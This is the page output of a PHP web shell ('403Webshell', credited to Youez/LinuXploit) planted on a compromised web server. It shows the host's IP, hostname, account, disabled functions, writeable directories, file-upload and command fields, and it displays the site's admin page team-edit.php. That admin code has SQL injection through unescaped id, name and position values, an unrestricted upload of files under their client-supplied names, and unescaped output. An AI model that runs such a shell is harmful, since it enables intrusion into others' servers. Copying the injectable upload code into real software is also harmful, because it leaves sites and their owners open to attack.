403Webshell
Server IP : 108.170.25.35  /  Your IP : 3.23.101.60
Web Server : Apache/2
System : Linux gains.winzonesoftech.com 4.18.0-513.24.1.el8_9.x86_64 #1 SMP Mon Apr 8 11:23:13 EDT 2024 x86_64
User : valamburi ( 1607)
PHP Version : 8.1.28
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/valamburi/public_html/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/valamburi/public_html/admin/team-edit.php
<?php include('session.php')?>
<?php include('header.php')?>
  <link href="vendor/datatables/dataTables.bootstrap4.min.css" rel="stylesheet">
<style>
img.banner {
    width: auto;
    height: 86px;
}
.btn-primary {
  color: #fff;
  background-color: #3a3b45;
  border-color: #787878;
}
</style>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
 
<script type="text/javascript">
  $(document).ready(function(){
    $('.filesizecheck').on('change',function(){
      for(var i=0; i< $(this).get(0).files.length; ++i){
        var file1 = $(this).get(0).files[i].size;
        if(file1){
          var file_size = $(this).get(0).files[i].size;
          if(file_size > 500000){
            $('#error-message').html("File upload size is larger than 500KB");
            $('#error-message').css("display","block");
            $('#error-message').css("color","red");          
			$( ".dis-data" ).prop( "disabled", true );

          }else{
            $('#error-message').css("display","none");
			$( ".dis-data" ).prop( "disabled", false );
          }
        }
      }
    });
  });
</script>
<script>
function show_confirm() {
    return confirm("Are You Sure");
}
</script>


<?php
$id=$_GET['id'];
$sql1=mysqli_query($conn,"select * from team where id='$id'");
$row1=mysqli_fetch_array($sql1);
 if(isset($_POST['submit']))
	 {
		 $name=$_POST['name'];
		 $position=$_POST['position'];
		 
		 
		 move_uploaded_file($_FILES['image']['tmp_name'],"img/".$_FILES['image']['name']);

$image="img/".$_FILES['image']['name'];

  if($_FILES['image']['tmp_name'] != ""){

			$sql=mysqli_query($conn,"update team set image='$image',name='$name', position='$position'  where id='$id'");

			  }
   else{
	$sql=mysqli_query($conn,"update team set name='$name', position='$position'  where id='$id'");
   
   }
   
    
			 if($sql)
 {
  echo "<Script>alert('Details Inserted Successfully')</script>";
   echo "<Script>window.location.assign('team.php')</script>";
 }
 else
 {
	 echo "<Script>alert('Insertion Failed')</script>";
 }
		 
	 }

?>
<body id="page-top">

  <!-- Page Wrapper -->
  <div id="wrapper">

    <!-- Sidebar -->
    <?php include('sidebar.php')?>
    <!-- End of Sidebar -->

    <!-- Content Wrapper -->
    <div id="content-wrapper" class="d-flex flex-column">

      <!-- Main Content -->
      <div id="content">

        <!-- Topbar -->
        <?php include('topbar.php')?>
        <!-- End of Topbar -->

        <!-- Begin Page Content -->
        <div class="container-fluid">

          <!-- Page Heading -->
          <div class="d-sm-flex align-items-center justify-content-between mb-4">
            <h1 class="h3 mb-0 text-gray-800">Edit Team Members</h1>
            <a href="team.php"><h1 class="h3 mb-0 text-gray-800">Go Back</h1></a>
            </div>





			<div class="card shadow mb-4">
			<div class="col-lg-7">
            <div class="p-5">
              <div class="text-center">
     
              </div>
              <form class="user" method="post" enctype="multipart/form-data">
                 
              <div class="form-group">
			  	<label for="exampleInputFile">Name</label></br>
                   
	<input  class="form-control  " type="text" name="name" value="<?php echo $row1['name'];?>" >
	 
    </div> 

                	 
              <div class="form-group">
			  	<label for="exampleInputFile">Position</label></br>
                   
	<input  class="form-control  " type="text" name="position" value="<?php echo $row1['position'];?>" >
	  
    </div> 

                	 
              <div class="form-group">
			  	<label for="exampleInputFile">Upload Photo</label></br>
                   
				   <img class="banner" src="<?php echo $row1['image'];?>">
	<input  class="form-control filesizecheck" type="file" name="image" id="otherAnswer">
	 <span id="error-message" class="validation-error-label"></span>
    </div> 

                	  
				<input type="submit" class="btn btn-primary btn-user btn-block dis-data" name="submit" value="ADD" style="background-color:#b5913c ; border:1px solid #b5913c;"> 
                
            
                
              </form>
             
            </div>
          </div>

		</div>
											
											
		
 <!-- DataTales Example -->

          <!-- DataTales Example -->
          <div class="card shadow mb-4">
            <div class="card-header py-3">
              <h6 class="m-0 font-weight-bold text-primary">DataTable</h6>
            </div>
            <div class="card-body">
              <div class="table-responsive">
  
                <table class="table table-bordered" id="dataTable" width="100%" cellspacing="0">
                  <thead>
                    <tr>
                      <th>S.No</th>
					  <th>Name</th>
					  <th>Position</th> 
					  <th>Image</th> 
					 
					  <th>Delete</th> 
                    </tr>
                  </thead>
                  
                  <tbody>
                    <?php
 $x = 1;
  $sql=mysqli_query($conn,"SELECT * FROM team");
 while($row=mysqli_fetch_array($sql))
 {
	
  ?>
  <tr>
    <td><?php echo $x; ?></td>
	<td><?php echo $row['name']; ?></td>
	<td><?php echo $row['position']; ?></td>
	 
	 
	<td><img class="banner" src="<?php echo $row['image']; ?>" /></td>
	  
    
    <td> <a title="Delete" href="team-delete.php?id=<?php echo $row['id']; ?>" class="" onclick='return show_confirm();'><img class="" src="img/del.png"></a></td> 
   
  </tr>
   <?php 
   $x++;
   } 
   echo '<script type="text/javascript"> drawChart(); </script>'; 
   ?>		
                  </tbody>
                </table>
          
         </div>  
        </div>	
		</div>	

										
											
        
        </div>
        <!-- /.container-fluid -->

      </div>
      <!-- End of Main Content -->

    
<?php include('footer.php')?>

Youez - 2016 - github.com/yon3zu
LinuXploit